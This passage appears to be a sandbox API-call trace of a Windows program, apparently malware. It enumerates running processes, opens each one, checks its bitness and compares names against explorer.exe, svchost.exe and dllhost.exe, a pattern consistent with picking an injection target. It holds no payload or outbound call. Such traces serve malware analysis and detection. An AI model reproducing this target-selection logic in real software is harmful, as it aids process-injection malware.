th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0263.410] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0263.410] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0263.411] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0263.411] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0263.412] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0263.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0263.412] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0263.413] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0263.413] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0263.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0263.414] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.414] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.414] CloseHandle (hObject=0xec) returned 1 [0263.414] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0263.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0263.414] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0263.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0263.415] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.415] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.415] CloseHandle (hObject=0xec) returned 1 [0263.415] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0263.415] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0263.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0263.416] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0263.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0263.416] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.416] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.416] CloseHandle (hObject=0xec) returned 1 [0263.416] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0263.416] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0263.416] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0263.417] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0263.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0263.417] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.417] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.417] CloseHandle (hObject=0xec) returned 1 [0263.417] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0263.417] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0263.417] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0263.417] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0263.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0263.418] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.418] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.418] CloseHandle (hObject=0xec) returned 1 [0263.418] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0263.418] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0263.418] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0263.418] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0263.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0263.418] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.418] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.418] CloseHandle (hObject=0xec) returned 1 [0263.418] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0263.418] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0263.419] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0263.419] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0263.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0263.419] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.419] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.419] CloseHandle (hObject=0xec) returned 1 [0263.419] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0263.419] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0263.419] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0263.419] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0263.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0263.420] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.420] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.420] CloseHandle (hObject=0xec) returned 1 [0263.420] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0263.420] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0263.420] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0263.420] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0263.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0263.420] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.420] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.420] CloseHandle (hObject=0xec) returned 1 [0263.420] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0263.420] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0263.421] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0263.421] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0263.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0263.421] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.421] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.421] CloseHandle (hObject=0xec) returned 1 [0263.421] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0263.421] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0263.421] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0263.421] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0263.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0263.422] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.422] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.422] CloseHandle (hObject=0xec) returned 1 [0263.422] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0263.422] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0263.422] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0263.422] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0263.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0263.422] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.422] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.422] CloseHandle (hObject=0xec) returned 1 [0263.422] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0263.422] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0263.423] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0263.423] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0263.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0263.423] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.423] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.423] CloseHandle (hObject=0xec) returned 1 [0263.423] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0263.423] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0263.423] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0263.423] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0263.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0263.424] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.424] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.424] CloseHandle (hObject=0xec) returned 1 [0263.424] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0263.424] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0263.424] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0263.424] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0263.424] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0263.424] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.424] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.424] CloseHandle (hObject=0xec) returned 1 [0263.424] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0263.424] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0263.424] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0263.425] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0263.425] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0263.425] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.425] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.425] CloseHandle (hObject=0xec) returned 1 [0263.425] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0263.425] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0263.425] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0263.425] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0263.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0263.426] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.426] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.426] CloseHandle (hObject=0xec) returned 1 [0263.426] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0263.426] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0263.426] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0263.426] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0263.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0263.426] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.426] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.426] CloseHandle (hObject=0xec) returned 1 [0263.426] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0263.426] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0263.426] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0263.427] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0263.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0263.427] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.427] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.427] CloseHandle (hObject=0xec) returned 1 [0263.427] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0263.427] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0263.427] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0263.427] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0263.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0263.428] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.428] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.428] CloseHandle (hObject=0xec) returned 1 [0263.428] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0263.428] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0263.428] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0263.428] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0263.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0263.428] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.428] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.428] CloseHandle (hObject=0xec) returned 1 [0263.429] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0263.429] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0263.429] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0263.429] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0263.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0263.429] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.429] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.429] CloseHandle (hObject=0xec) returned 1 [0263.429] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0263.429] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0263.429] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0263.429] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0263.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0263.430] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.430] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0263.430] CloseHandle (hObject=0xec) returned 1 [0263.430] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0263.430] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0263.430] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0263.430] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0263.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0263.430] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0263.431] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0263.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0263.431] Process32Next 